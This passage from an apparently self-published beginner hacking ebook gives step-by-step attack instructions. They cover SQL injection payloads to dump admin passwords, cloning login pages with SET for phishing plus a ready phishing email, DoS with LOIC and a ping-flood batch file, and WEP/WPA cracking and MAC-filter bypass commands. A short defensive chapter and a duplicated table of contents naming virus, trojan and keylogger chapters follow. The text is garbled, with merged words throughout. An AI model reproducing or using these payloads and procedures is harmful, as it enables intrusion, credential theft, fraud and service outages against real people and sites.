http://www.testing_site.com/index.php?id=2'

If the page remained on the same page orshowed page not found, it means a notvulnerable site.

And if you got an error message like thisone it means that site is vulnerable.

You have an error in your SQL syntax;check the manual that corresponds toyour MySQL server version for the right

syntax to use near '\'' at line

4. Awesome you found a website that isvulnerable. Now we will need to find thenumber of columns present in the targetdatabase. For that replace the singlequotes() with order by 1 or order by2 or order by 3 order by 4,5,6,7statement.

For example:

http://www.testing_site.com/index.php?id=2 order by 1

http://www.testing_site.com/index.php?id=2 order by 2

http://www.testing_site.com/index.php?id=2 order by 3

http://www.testing_site.com/index.php?id=2 order by 4

Keep trying each time until you get theerror like unknown column.

In case ,if the above method fails to workfor you, then try to add the "--" at the endof the statement.

http://www.testing_site.com/index.php?id=2 order by 1--

http://www.testing_site.com/index.php?id=2 order by 2--

http://www.testing_site.com/index.php?id=2 order by 3--

http://www.testing_site.com/index.php?id=2 order by 4--

http://www.testing_site.com/index.php?id=2 order by 5--

5. Finding the vulnerable columns

Now lets find the vulnerable column bytrying the query "union selectcolumns_sequence".

6. Now change the id value tonegative(id=-2). Its time to replace thecolumns sequence from 1 to x-1 separatedwith commas(,)

http://www.testing_site.com/index.php?id=-2 union select 1,2,3,4,5,6,7

When this code is executed. You willretrace the vulnerable column. There youhave it.. column 3 and 7 are vulnerable.Lets take the vulnerable colmn 3 first.

7. Replace the column 3 from the querywith version.

For example

http://www.testing_site.com/index.php?id=-2 and 1=2 union select1,2,version(),4,5,6,7

This should display the version at 5.0.1or 4.3

8. Change the version() with database()and user() to find the database userrespectively.

For example:

http://www.testing_site.com/index.php?id=-2 and 1=2 union select1,2,database(),4,5,6,7

If nothing happens or It went wrong trythis one:

http://www.testing_site.com/index.php?id=-2 and 1=2 union select1,2,unhex(hex(@@version)),4,5,6,7

9. We are almost done . All that we have

to do now is to find the table name.

To do that we will have to replace the 3with group_concat(the table name) andincluded with the frominformation_schema.tables wheretable_schema=database ()

For example:

http://www.testing_site.com/index.php?id=-2 and 1=2 union select1,2,group_concat(table_name),4,5,6,7from information_schema.tables wheretable_schema=database()

10. Now with this it will show you alist of table of names. Its up to you tofind the table name witch is related withthe user or admin.

11. Now you need to replace thegroup_concat(table_name) with thegroup_concat(column_name)

12. Also replace frominformation_schema.tablestable_schema=database()--" with "FROM

information_schema.columns WHEREtable_name=mysqlchar--

And we have to change the table name toMySwl CHAR() string.

13. It would be great if you couldinstall the HackBar addon right now(see Figure 6-1)

In Figure 6-1 .Here Im showing how itwill look like when youre about todownload to script.

Once its installed there will be thistoolbar. Press on F9 to show/hide it(seeFigure 6-2)

In Figure 6-2 .Here the hackbar is inaction ready to start hacking

14. We go to sql->Mysql->MysqlChar() inside the hackbar.

This will demanding the string that wewant to change to MySQLCHAR(). Nowwhat we have to do is type the code at theend of the url instead of the "mysqlchar"

For example:

http://www.testing_site.com/index.php?id=-2 and 1=2 union select1,2,group_concat(column_name),4,5,6,7from information_schema.columns wheretable_name=CHAR(97, 100, 109, 105,110)

15. Now you are supposed to see thelist of column.

For example:

example: admin,password,admin_id,admin_name,admin_password,active,id,admin_name,admin_pas

s,admin_id,admin_name,admin_password,ID_admin,admin_username,username,password..etc..

16. And next, replace the the replacegroup_concat(column_name) withgroup_concat(columnname1,0x3a,anothercolumnname2

17. Now replace the " frominformation_schema.columns wheretable_name=CHAR(97, 100, 109, 105,110)" with the "from table_name"

For example:

http://www.testing_site.com/index.php?

id=-2 and 1=2 union select1,2,group_concat(admin_id,0x3a,admin_password),4,5,6,7from admin

18. Its supposed to show the datastored in the database. Depends on thecolumn name .If all of these query givesan error message then try some othercolumns name from the list.

19. Now its time to try with one ofthese url link for finding the url link.

http://www.testing_site.com/admin.php

http://www.testing_site.com/admin/http://www.testing_site.com/admin.htmlhttp://www.testing_site.com:2082/

After then with few tries with failures,you will wind up inside the administratorpage using these urls examples.

Introduction to Phishing

Phishing is a method for hacking intopeople account by sending them an email

that really looks legitimate with thepurpose to retrieve the person financialinformation from the recipients. Most ofthe time the messages might look to comefrom a trustworthy website. This emailmight look like they are coming from anonline banking site, social network site oran online shopping site.

One of the most common ways to fool avictim is by lying in the message that thevictim has fraudulent activity on theaccount. And, in the bottom you might putclick here to verify your information.

Whaling

This type of phishing is specificallydirected to many high ranking personinside the business or the organization.

Spear phishing

This one is focused on any people whohave some connection with theorganization

Performing Phishing

Here Im about to show you how you canhack any social network account or anemail account or even a bank account byusing the phishing method to retrieve theuser account information.

Phishing actually consist of these processwitch I call Manual Phishing:

1. Copy the login page

2. Search for the code line insidesource code

3. Make some changes inside the code

4. Create a free hosting account , Mostof the times your account gets suspendedcause its against the rules to have aphishing site online

5. Upload the fake Login Page youcreated on the hosting site.

6. Send a fake email to your victim

7. Then at last but not least retrieve theinformation the victim entered.

But this can actually consume time andsome work, which is by saving theindex.html file to the computer and thenupload it into a website server and itdoesnt always work. So, I found a waythat is much more exciting and easy inbacktrack (Not installed in virtualmachines, but either booted from a liveCD or fully installed on your hard disk orelse it won't work) I call it Automated

Phishing:

1. First run Backtrack to the desktopand run the terminal.

2. To read your ip address Type:

ifconfig

3. Next lets go in the pentest by typing:

cd /pentest/exploits/set

4. Now that we are in the folder type in

./set

(Y to agree the terms)

5. Select 1 for Social-EngineeringAttacks

6. Now we choose 2 to select theWebsite Attack Vectors.

7. We now select 4 for TabnabbingAttack Method.

8. We now select 2 for Site Cloner.

9. Enter your ip the machine your usingthat you saw earlier .

10. In this step you will have to enterthe name of the site you want to make aphishing page. It could be again ANYsocial network site or email site forexample:http://www.ffthesocialnetwork_or_emailsite.com/

11. After a few moment of waiting itasks to press Return, So do it afterwardspress Enter (see Figure 6-3)

In Figure 6-3 .It will look like this whenits ready to initiate.

12. Now what actually happened isthat your ip address has turned into yourphishing page link.

13. The next step is make your IPshorter to do so we go to http://goo.gl/and paste our link and click on ShortenUrl. (see Figure 6-4)

In Figure 6-4 .This is the google urlshrinker in action.

14. And there you have it test the linkif it works. Now you need to either emailthe link or message the link to a friendthat can handle this prank or yourself foreducational purposes.

15. Now when the ID and thePassword is entered youll receive theemail and password in your terminal. (Soleave the terminal open and dont restartthe PC until its in otherwise the ip mightchange).

Writing the Email

Now your website is ready, the only thingthat is missing is to write your fake emailwith your link inside it. Take a moment toanalyze this fake letter.

Dear Customer

We regret to inform you that we had tolock your account access because wehave reasons to believe that it may havebeen compromised by outside parties.

In order to protect your sensitiveinformation, we temporarily suspended

your account access.

Click here to verify and reactivate youraccount access by completing the secureform that will appear.This securitymeasure that will ensure that you arethe only person with access to theaccount . Thank you for your time andconsideration in this matter.

Please do not reply to this message

For any inquiries, contact CustomerService.

As you can see here the guy who wrotethis did a bit of research on the victim lifeor personal information before writingthis phishing mail. And thats exactlywhat phishing is all about. Dont try thisat home.

Small summary ahead

* SQL injection is used to gain entriesfrom the available public entry to thedatabase.

* SQL injection are forms of contact,feedback fields, shopping cards and manymore. Most of the fields allow for SQLcommands.

* Phishing is a method for hacking intopeople account by sending them an emailthat really looks legitimate with thepurpose to retrieve the person financial

information from the recipients.

* There are two types of phishingWhaling and Spear Phishing

Share on Facebook Tweetthis Guide

Chapter 7 Denial ofService in Depth

We will cover:

* What is Denial of Sercice

* How DoS works

* Building a DoS attack

* DoS on the DNS

Have you ever liked to crush thingswhen you were a kid? And, when you gotolder things had got digitally and it wasimpossible to do so? Now here I willpresent to you DoS itself right in front ofyou to make your old dream to come trueagain.

What is Denial of ServiceDDoS Distributed Denial of Service. ADDoS attack is a malicious attempt tomake a server or a network unreachableof the client, usually by temporarilymaking it slow or down the services of ahost.

Specific DoS Attacks Types:

* UDP Flood

* ICMP Flood

* Ping of Death

* Slowloris

* Zero-day DDoS

How Dos works

A lot of peoplemight be thinkingthat DDoS is aboutcracking the securityor to change privateinformation. Forexample, an EmailDenial of Serviceattack its not abouthacking the useremail but to preventhim from checking,

receiving or sendingthe mails. It workslike you alreadymight probablyalready guessed bysending mass andmass of requestcontinuously.

And with this theservice/serverbecomes either slowor crashes. Whatshappening really is

either the systemcant figure outwhich packet is realor not and even if itdoes it slow thesystem capacityspeed to handle allof them in time.

Limitations of DoSIn these days theservices are really

strong and clever forexample the servicemight be gettingmany good packagesfrom many otherdevices and there isone device that issending manypackages that onenormally does not.What happens is thatthe attack needs tobe stopped.

Sometimes evenwhen the DDosmanages to put theservice/server down.It goes back up aftera few moments.

Another one if youonly got one attackerattacking a websiteand that website hasso many traffic on it.It would be almostimpossible because

so many people aresending their packetsand that gets in yourway and that wouldintervene everything.

Building a DoS Attack

First stuff you need to be finding a servicethat you can target, something with openports for example. Service that supportsopen connections like:

* Web servers

* Email servers

* DNS servers

Also connection that dont have limit . Tofind out that it has no limit send packageto see how much it can hold. Send a lot ofemail attachments into their system. And,lets say you dont have a specific targetyou can just flood it like we would do,but it takes more flooding and moreconnection to do it.

Setting up the tools

1. I will be using Advanced Port Scannerfor this exercise. I found mine for free ingoogle go ahead ,take a look, download itand install it (see Figure 7-1)

In Figure 7-1 . Here Advanced PortScanner in the installation process.

It scans in the network it shows you allthe networks that are on the network.Here, on my network I found a machinewith server and with its open ports(seeFigure 7-2)

.

In Figure 7-2 .Advanced Port Scanner ishere in action scanning ports

2. Okay so now that we have the system(router) and the port Ill be setting up thesecond tool called Low Orbit IonCannon(LOIC) . Its an open sourcesoftware and can be downloaded it at:sourceforge.net/projects/loic/ (see Figure7-3)

In Figure 7-3 .This is how LOIC islooking when its running.

3. And now in the IP field Imgoing to fill in the IP of the server I foundAfter then click on lock on.

4. Fill in the port field a port that.

5. Also change the method field toTCP. And click on IMMA CHARGINMAH LAZER to mount the attack, quicklythe Requested will start increasing fast.

With this the server could either startgetting slower by getting many resourcesor Its defending itself from this kind ofattack.

6. Now if you click stop and change theport to another open port it and drag theslider in the TCP/EDP message area andmake it slow to confuse the server fromdefending itself and hit on IMMA

CHARGIN MA LAZER again.

Now its up to you, to set up fewcomputers maybe eight or ten with LOICinstalled on them doing the same thing onthe same port.

After a few moment of flooding, trypinging the router in cmd. And if you gotRequest Time out that means the routermight be down..

DoS On a DNS

DNS is actually IP address simplified inwords and letters which makes it easy forsomeone to use instead of IP address forexample www.test.com. Here, I willshow you how to DDos any website usingtheir DNS. As complicated as it maysound all that it really takes someknowledge on how to work with CMD.

1. Okay so now run your windows thatyour using. Ill be using Windows 7 andrun notepad.

2. In notepad write down these coupleof lines:

color a

title DDOS sitename.com

ping www.siename.com -t -l 20000

2. Save this text file as a .BAT file

4. And now go to the folder you savedthe file and run this file multiple times.Youll end up with many CMD windowspinging (flooding) the site.

Sometimes it may give you Request timed

out , but that's not a big of a deal.

But if it keeps and always giving youRequest timed out and "no Reply" fromthe site at all that means the site is reallybig and difficult to put down or you reallyneed some powerful computers with goodPC to get some replies.

Here, I'll be showing you I have 160 batfile opened running and that's it(seeFigure 7-4)!

In Figure 7-4 .Here Im showing you howI have 156 cmd opened DDoS mywebsite.

5. Dont close the command promptsand leave them working for an hour oreven more (The bigger the site the moretime it takes). While command promptsare running keep refreshing the site to seeif it's still up and eventually after a fewmoments it will be down.

A tip to make sure the site goes downand faster is to do this trick of openingmany command prompt on multiplecomputers. The more computer you havebetter.

Small summary ahead

* DDoS attack is a malicious attempt tomake a server or a network unreachableof the client, usually by temporarilymaking it slow or down the services of ahost.

* Sometimes even when the DDos

manages to put the service/server down.It goes back up after a few moments.

* When you are about to DoS somethingfind a network with open ports

* Advanced Port Scanner is a softwarefor the Port scanning in the network

* DNS is actually IP address simplifiedin words and letters.

Share on Facebook Tweetthis Guide

Chapter 8 Wireless hack

We will cover:

* How security wifi is encrypted

* Tools to crack a wifi

* Cracking WEP wireless password

* Cracking WPA/WPA2 wireless

password

* Cracking wifi password in windows

* Bypassing MAC Address filter

Sometimes you might end up with manywireless connection having no access tothem because they are encrypted withpassword protection now this can be apain in the ass. In this chapter, Ill teachyou on how to find the wifi passwordwith no hard work.

How security wifi isencrypted

WI-FI had many encrypted technologies.The first encryption WEP was easy to gethacked into. But then later came the WPAand the WPA2.

WEP(Wired Equivalent Privacy)

This is the encryption that is used mostlyin all countries over the world in thesepast years. But it turned out that the WEP

encryption was really vulnerable and wascracked using free softwares. In 2004WI-FI alliance retired WEP.

WPA(Wi-Fi Protected Access)

WPA was a complete replacement overthe WEP. What was new in thisencryption, was the message integritychecks. What this does, it determines if anattacker had captured between the accesspoint. And, the strong configuration waslater superseded by Advanced EncryptionStandard (AES).But soon after that WPAalso turned out to a vulnerable protection.

WPA2(Wi-Fi Protected Access 2)

Because WPA turned out to be vulnerableafter all , WPA2 came in with CCMP.This encryption is almost impossible tocrack into. But if you really want to breakinside the WPA2 all it takes its the sametechnique used for the one of WPA.Which could take from two to fourteenhours.

Tools to crack a wifi

There are various tools out there to helpwith wifi hacking but today Ill show youthe most popular ones commonly usedevery day in every single moment in thehacking life.

The tools

* Backtrack

* Airmon-ng

*Commview

*Compatible wifi card

The biggest requirement that youll needis a good wireless adapter or else yourdone for. It has to be a good adapter thatreceives packages real fluently. Herebelow I will show you the adapters Ifound useful to be good for this exercise.

Cracking WEP wirelesspasswordIn this exercise we will start first withWEP encryption hacking.

1. First run backtrack to desktop andopen the terminal.

2. To get a list of the network interfacestype in(see Figure 8-1):

airmon-ng

In Figure 8-1 .With this you can see allthe wireless interface listed

3. Here you can I see I have a wlan0

4. Next step would be to do theairmon-ng start (interface) so I would

type:

airmon-ng start wlan0

5. Now to find the networks in area andpick it we will be using airodump-ng(interface) . So I type :

airodump-ng mon0

6. Hit Ctrl+c to stop the list when you

found your desired wifi you want to hack.(see Figure 8-2)

In Figure 8-2 .Here I have all the wifilisted in the area.

7. Now we are going to see whatsgoing on in that network, and capturepackets from it to a file using airodump-ng -c (channel) -w (file name) bssid(bssid) (interface) so in my case I type in:

airodump-ng c 6 w darkknight --bssid00:05:5D:EC:AA:52 mon0

8. Now leave that terminal open and

run another terminal and we will use thiscommand aireplay-ng -1 0 -a (bssid)mon0

So I type in:

aireplay-ng -1 0 -a 00:05:5D:EC:AA:52mon0

9. Now this time we will start gettingthe mass packets that we needed by using aireplay-ng -2 p 0841 cFF:FF:FF:FF:FF:FF b (bssid) mon0 . SoI will type in:

aireplay-ng -2 p 0841 cFF:FF:FF:FF:FF:FF b00:05:5D:EC:AA:52 mon0

Choose y for yes. And with thatbacktrack will start collecting mass andmass of packets this time, leave itworking for some while.

10. Once you think you got enoughpackets maybe after 5 to 6 hours or evenmore open the third terminal and I wouldtype:

Aircrack-ng wep*.cap

And there it should display the foundpassword.(see Figure 8-3)

In Figure 8-3 .In here you can see thepassword that I found of my own wifiduring the test

Cracking WPA/WPA2Wireless Pass

In this exercise we will continue withWPA/WPA2 password to hack intoWPA/WPA2 encryption.

1. Open backtrack to the deskop andrun two terminals

2. In the 1st terminal type in:

airmon-ng

And the interface will come up.

3. So type in :

airmon-ng start wlan0

4. airodump-ng mon0 to see the networkI will use the dlink because its mine. (seeFigure 8-4)

In Figure 8-4 .Here its scanning the wifiin the Area just like before.

Press ctrl+c to stop the process when yousee the network you want use.

5. And now go to the second terminaland install reaver . First we will get aupdate so we type in :

apt-get update

6. And now we install reaver bytyping :

Apt-get install reaver

7. And now we type in to start usingreaver:

Reaver i mon0 b 70:19:70:5A:63:26 vv

8. And now let it run it could take 2 to10 hours and after that when it getcracked youll get this (see Figure 8-5)And we found the password in WPAPSK: nnoosecretts

In Figure 8-5 .After a while of scanning

here it found the password I was lookingfor.

Crack Wi-Fi passwords inWindows

Lunix is not the only operating system thatis able to hack wireless passwords.Windows also uses aircrack-ng toaccomplish wifi password hacking. Somepeople find it easier to use windowsbecause of the graphical user interface soI made an exercise that teaches it.

1. First download commview for freetrial version athttp://www.tamos.com/download/main/ca.php

It can also be bought at from site itself.This is a tool for monitor wireless.

2. Once its done , lunch commview(seeFigure 8-5) and go in the note Tab

In Figure 8-5 .shows you Commviewopened ready to start doing some sniffing.

3. Click the blue start button this willopen the scanner dialog and in there clickthe Start Scanning

4. Let is scan until you find the networkyou want to attack. And, if still you cantfind the network you may want to changethe channel(see Figure 8-6)

. And when you found it, stop the scanningand click on capture.

WIn Figure 8-6 .There are the wifis in thearea being scanned

5. WPA hacking is deferent from WEPhacking. WPA a handshake needs to becaptured with that being sad I recommendto leave the scanner running to increasethe chance for capturing a handshake.

6. When you think you have enough, stopthe capturing, go to the Logging tab andclick on Concatenate Logs and save itwith any file name on the Desktop. (seeFigure 8-7)

WIn Figure 8-7 .Here are how your settingsneeds to look like when youre about tosave your log file

7. Now go to File->Log Viewer . Andonce the Dialog opens go to File->LoadCommView Logs.. And from there loadthe file you just saved.

8. And go to File->Export Logs->Wireshark/Tcpdump Format And giveit a name and save.

9. Now we go to www.aircrack-ng.org/install.html and click on Pre-compiled and from there downloadAircrack-ng GUI.exe(see Figure 8-8)

In Figure 8-8 .This is the Aircrack-ngGUI running ready to crack the file

10.Change the encryption to WPA andclick Choose in the Wordlist, browsewhere you want to save the password listin a text file. For example passwordlist.txt . Then click Launch

11. This will open commandprompt with all the network listed in andin the encryption you will see if it hashandshake or not. (see Figure 8-9)

In Figure 8-9 .Here is how it looks like

when you have to select the mac addressof the wifi you hacked

Choose the number of Index and target thenetwork in my case I choosed: 5

12.And Aircrark will start on searchingthe possible passwords and then when itfinds the password it will stop runningand give you the key found. (see Figure8-10)

In Figure 8-10.Here is how it looks likewhen it did found the password

And thats how you find a wi-fi passwordin windows. Fairly easy just by usingGraphical User Interface.

Bypassing MAC AddressfiltersSometimes you might have the passwordfor the wifi in the area. But youre not inthe mac address list. For example youmight have to pay the front desk to get acomplete access to the wifi to gaininternet. Here I will show you how tobypass the mac address filter.

1. Run backtrack to the desktop run theterminal

2. Now type :

airmon-ng start wlan0

airodump-ng mon0

3. Copy the BSSID of the network wewant to hack mine is: 98:FC:11:69:E6:07

4. Now we will search some packetsfrom the wifi. We will use airodump-ng c [channel] a --bssid [bssid] mon0.That means I would type:

airodump-ng c 9 a --bssid 98:FC:11:69:E6:07 mon0

5. Now we wait for the terminal towork until we get some packets under theSTATION (see Figure 8-11)

In Figure 8-11.Here is how it looks likewhen it did found the password.

6. Once you found the mac addressunder the station copy it. Mine is00:12:3E:78:3F:7F

7. Now we are taking the interfacedown by typing:

Ifconfig wlan0 down

Macchanger m 00:12:3E:78:3F:7Fwlan0

Ifconfig wlan0 up

8. Now lunch the wireless manager bygoing start->internet->Wicd NetworkManager

9. Disconnect all, give it a refresh andconnect to the wifi you by passed its filerand it should work

Sometimes if you by pass the mac filteryou might lose the internet. It might bebecause they found out that you spoofedinside the network and they kicked youout.

Small summary ahead

*WEP encryption is the most vulnerableencryption for wifi.

*WPA2 encryption is the strongestencryption for wifi

Commview,Airmon-ng Compatible wifiare the requerments for wifi hacking.

*If the adapter is not strong enough youwont be able to get enough packages todo the hacking

*Mac address filtering can be bypassedusing backtrack

Share on Facebook Tweetthis Guide

C h a p t e r 9 Defendingfrom Hackers

We will cover:

*Protect yourself against Dos attacks

*Best tool to remove the virus

*Securing your operating system

*Securing your wireless

As a being a hacker it would be very sadto get hacked by another hacker or evenyoure not a hacker, its inappropriate toget hacked by someone else. So here Igathered few methods that will help youprotect yourself from black hat hackers.

Protect yourself againstDoS attacks

DoS cannot be blocked by firewalls, anti-virus or any of those softwares. Itsalmost inevitable, but there are still somesofwares and ways to prevent DoS fromhappening. In this exercise I willdemonstrate you how to prevent them.

Protecting the network

Using VPN or using proxys is the bestway to protect your router and networkfrom getting DoSd. Because when theattacker starts flooding your IP, what he isactually doing is flooding the wrong IP

(faked ip) and with that he/ she wont getthe chance to reach your computer orrouter.

Here are the free vpnsoftwares available:

*Hotspot Shield

* Hola Unblocker

* Expat Shield

* HideMyAss

Protecting the siteWebsites are the main target for attackingin terms of DoS. In most cases if theattacker manages to get a stack ofcomputers he might be able to drop thesite down. Here, I will show you what touse so that even with a million computerspinging your site it would impossible tocrash your site.

1. Go to cloudflare.com and register afree account. (see Figure 9-1)

In Figure 9-1 .shows you how Cloudflareis looking when youre in

2. And when youre in your account youcan have multiple sites set in youraccount.

3. Now once your website is set go toyour website DNS settings and leave thedirect connect to ON.

4. Also make sure at the top everythingis going through cloud flare so leave themON

Best tool to remove thevirus

I won't be talking about which are the bestantivirus softwares to use. Most of themare good and they do the job right, but it'snot always that antivirus can delete itproperly or even detect it. Here, I will beshowing you the best 9.8 megabytes toolever existed to clean the PC . We will beusing Malwarebytes for this task sofollow it closely.

1. Go to malwarebytes.org/downloads/and download it for free(see Figure 9-2)

In Figure 9-2 .shows you howMalwarebytes looks like once youre in

This software had worked better than allthe 25 antivirus Ive tested in the past fewyears. So get your right now.

2. Navigate a bit in the tabs

4. Once you installed it launch it.Choose for Peform Quick Scan and thenclick Scan.To test the software power.Maybe before you even click on scan

Malwarebytes already started toquarantine few malicious threads .

5. And once you scanned and deleted theviruses on the memory and HDD its timeto view the logs to see when and wherethe virus was created. (see Figure 9-3)

In Figure 9-3 .shows you how the log fileis looking like when you open it

Securing your operatingsystem

Having no virus on the OS is not justenough. There are sophisticated programscreated by hackers to penetrate yourcomputer (social engineering) no breakyour privacy. Ill be showing you twotools that I use every day to protectmyself from those people.

1. First go to www.zonealarm.com and

download the free version of zone alarm.

2. Once your done installing it launch it. What this program does, every programor virus that tries to use the network orthe internet, needs to get passed throughzonealarm. This really prevents hackersto enter your computer remotely.

3. After a few days when you blockedmany programs that werent supposed touse the internet you can view them inFirewall tab->amount programs secured(see Figure 9-4)

In Figure 9-4 .This is zone alarmshowing how it blocked all the programsyou selected from not using the internet ornetwork

3. Another great tool to completelyprotect yourself is the use of avast safezone. First of download or buy the fullversion of Avast. And when you installedit go to the SECURITY TAB->ToolsSection->SafeZone and click on Switch toSafeZone (see Figure 9-5)

In Figure 9-5 .Here in Avast you canactivate the Safe Zone to go secure

When your inside the SafeZone everyprogram of Windows doesnt affect thezone . And once your inside SafeZone youcan do online banking even more secureusing the browser it comes with.

Securing your wireless

We already discussed how to hack a wifiand the encryption types but here we willbe showing you how to secure it. Tosecure your wireless connection you cando it by using the WPA2 encryption thatreally lets you use letters and numbersand with that you can create a very strongpassword.

First off we will start securing the router

1. Open cmd and type in:

Ipconfig /all

2. From there locate the line that islabeled Gateway

3. With that Gateway IP you will pasteit in your favorite web browser addressbar.

4. If your using the Linksys go in thewireless security tab and change theSecurity Mode to WPA or WPA2

5. Also disable the

Remote Administration and also enablethe router firewall.

6. When youre done also change theadministration password.

Small summary ahead

*DoS can be prevented by using VPNsoftwares like Tor

*Website DoS can be preventing by usingCloudFlare

*The best antivirus in my opinion isMalwarebytes

*ZoneAlarm and Avast Safe zone arereally decent for computer security

*Securing the wifi happens in the RouterAdministrator settings

Share on Facebook Tweetthis Guide

Sad to say Farewell !

That was all folks! I really tried not talk alot in the chapters and only give the meatas much as possible. Hope you did learnone thing or two about computerpenetration. Hacking is a really cool stuffit simply makes you, a more importantperson then you already are if you knowwhat I mean.

If this book goes well Ill write an evenmore advanced book that goes more in-depth with the hacking subject such asXSS and Kali. Remember to use thispower you now gained for justice. Peace

If you enjoyed learningabout this book you maybe interested in this bookoriginal format that is inpaperback.

Paperback link

Also if you found this book greatplease leave a good review on thesales page.

Table of Contents

Chapter 1 Defining a HackerDedication. 4Acknowledgments. 8About the Author. 21Introduction. 38To who is this book aiming?. 54How to use the book. 80Chapter 1 Defining a Hacker. 99Who are hackers. 124What motivates hackers. 133Becoming a hacker. 159Dont ever go against the rules. 182Small summery ahead. 204Chapter 2 The Hackers Tools. 221Backtrack. 239

BackTrack's tools are organized into 12categories: 257

Wireshark. 269How it works. 281Vadilia TOR. 288Battle against Tor. 304How it works. 314Getting familiar with viruses. 323Top 5 destructive computer viruses in

History. 334Keylogger. 340How it works. 347Small summery ahead. 358Chapter 3 Creating virus. 370Building your first virus file. 382Creating a virus to disable USB ports.

412

Setting up Borland C++. 418Creating the C file that blocks usb ports.

434Creating virus that unblocks the USB

ports. 445Virus nested in the stick. 456Getting started with Trojan. 518These actions can include: 528Trojan backdoor. 532Make a simple Trojan Horse. 539Small summery ahead. 556Chapter 4 Cracking passwords. 567Types of passwords. 581Basic administrator password reset. 595Cracking the encrypted PDF. 611Bypass windows Password. 628Custom Made Keylogger. 657

Small summery ahead. 713Chapter 5 In Depth with Backtrack. 722History of backtrack. 737Installing backtrack. 746Metasploit using backtrack. 783Metasploit Terms. 796Peforming Metasploit to Penetrate Users

in LAN.. 805

Chapter 1 Defining a HackerDedication. 4Acknowledgments. 8About the Author. 21Introduction. 38To who is this book aiming?. 54How to use the book. 80Chapter 1 Defining a Hacker. 99Who are hackers. 124What motivateshackers. 133Becoming a hacker. 159Dont ever go against the rules. 182Small summery ahead. 204Chapter 2 The Hackers Tools. 221Backtrack. 239BackTrack's tools are organized into 12 categories: 257Wireshark. 269How it works. 281Vadilia TOR. 288Battle against Tor. 304How it works. 314Getting familiar with viruses. 323Top 5 destructive computer viruses in History. 334Keylogger. 340How it works. 347Small summery ahead. 358Chapter 3 Creating virus. 370Building your first virus file. 382Creating a virus to disable USB ports. 412Setting up Borland C++. 418Creating the C file that blocks usb ports. 434Creating virus that unblocks the USB ports. 445Virus nested in the stick. 456Getting started with Trojan. 518These actions can include: 528Trojan backdoor. 532Make a simple Trojan Horse. 539Small summery ahead. 556Chapter 4 Cracking passwords. 567Types of passwords. 581Basic administrator password reset. 595Cracking the encrypted PDF. 611Bypass windows Password. 628Custom Made Keylogger. 657Small summery ahead. 713Chapter 5 In Depth with Backtrack. 722History of backtrack. 737Installing backtrack. 746Metasploit using backtrack. 783Metasploit Terms. 796Peforming Metasploit to Penetrate Users in LAN.. 805